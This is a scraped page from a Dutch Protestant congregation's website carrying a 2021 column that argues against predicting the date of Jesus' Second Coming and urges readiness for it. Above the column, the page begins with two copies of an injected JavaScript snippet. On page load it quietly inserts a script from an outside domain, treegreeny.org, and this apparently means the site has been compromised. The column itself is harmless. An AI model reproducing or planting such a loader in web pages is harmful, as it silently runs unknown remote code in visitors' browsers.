;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); De Wederkomst - PKN Damwâld

De Wederkomst

Gepubliceerd op: maandag 4 oktober 2021

Enige tijd geleden waren er meerdere mensen, zelfs binnen Christelijke geloofsgemeenschappen, die naar hun overtuiging exact wisten aan te geven wanneer de Here Jezus terugkomt op deze aarde. Sommigen waren iets minder pertinent en gaven aan dat naar hun mening het einde der tijden zeer binnenkort zou zijn. Nu is binnenkort een rekbaar begrip maar de stellige overtuiging dat Jezus’ wederkomst toch zeker binnen 25 jaar zal zijn werd en wordt nog regelmatig verkondigd. Deze ‘voorspellers’ gaan er kennelijk aan voorbij dat Jezus zelf gezegd heeft dat zelfs Hij ‘de dag noch de ure’ kent, alleen de Vader weet dit. Dus is het wel wat aanmatigend ‘voorspellingen’ te doen over de datum van Jezus’ wederkomst. In de Bijbel wordt beschreven dat voordat Jezus terugkomt er diverse verschrikkelijke dingen op deze aarde zullen gebeuren. Jezus spreekt hier ook zelf over. Nu is het zeker een feit dat in onze tijd vrijwel constant sprake is oorlogen, geruchten van oorlogen, wetsverachting, hongersnood en al dergelijke moeilijke dingen. Maar ook in vorige tijden kwamen deze zaken met voortdurende regelmaat voor. Natuurlijk is het zo dat elke dag Jezus’ wederkomst dichterbij komt maar het is niet aan ons mensen om anderen bang te praten over de terugkomst van Jezus. Veeleer is het onze taak en ons voorrecht om andere mensen te wijzen op redding die Jezus ons biedt wanneer wij bereid zijn ons tot Hem te richten. De vraag is dus niet wanneer Jezus terugkomt en of wij dat goed hebben kunnen voorspellen maar de vraag is veelmeer of wij op Zijn komst zijn voorbereid. Jezus heeft aangegeven dat Zijn wederkomst onverwacht zal zijn. Daarom is het goed voor ons mensen om steeds rekening te houden met Zijn wederkomst.  Laten wij daarom onze inspanning er op te richten om voorbereid te zijn op Zijn komst en niet voortdurend tijd en energie steken in de voorspelling van de ‘dag en de ure’.

‘Als ‘t bazuingeschal des Heren klinkt en Jezus komst is daar, zijt gij dan voor Zijn komst bereid’?

Columnist:Wessel

Leer mij kennen
Uitgelezen?

Gelukkig hebben wij meer columns!

Bekijk al onze columns